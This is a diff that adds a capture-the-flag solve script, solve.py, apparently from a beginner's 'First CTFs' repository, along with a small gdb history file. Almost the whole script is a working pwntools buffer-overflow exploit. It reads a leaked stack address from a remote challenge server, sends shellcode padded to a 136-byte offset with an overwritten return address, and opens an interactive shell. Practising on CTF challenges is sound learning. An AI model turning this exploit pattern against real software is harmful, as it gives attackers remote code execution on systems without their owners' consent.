First CTFs

BOF/02_whispered_secrets/.gdb_history

@@ -0,0 +1,2 @@
+r
+quit

BOF/02_whispered_secrets/solve.py

@@ -0,0 +1,20 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("whispered_secrets", checksec=False)
+context.arch = "amd64"
+context.os = "linux"
+
+OFFSET_TO_RIP = 136
+
+p = remote("offsec.m0lecon.it", 13528)
+
+leak_line = p.recvline_contains(b"secret:")
+buf_addr = int(leak_line.split(b"secret: ")[1].strip(), 16)
+log.info(f"buf = {buf_addr:#x}")
+# NX disabled
+shellcode = asm(shellcraft.sh())
+
+payload = flat(shellcode, b"A" * (OFFSET_TO_RIP - len(shellcode)), p64(buf_addr))
+p.sendafter(b"secret:\n", payload)
+p.interactive()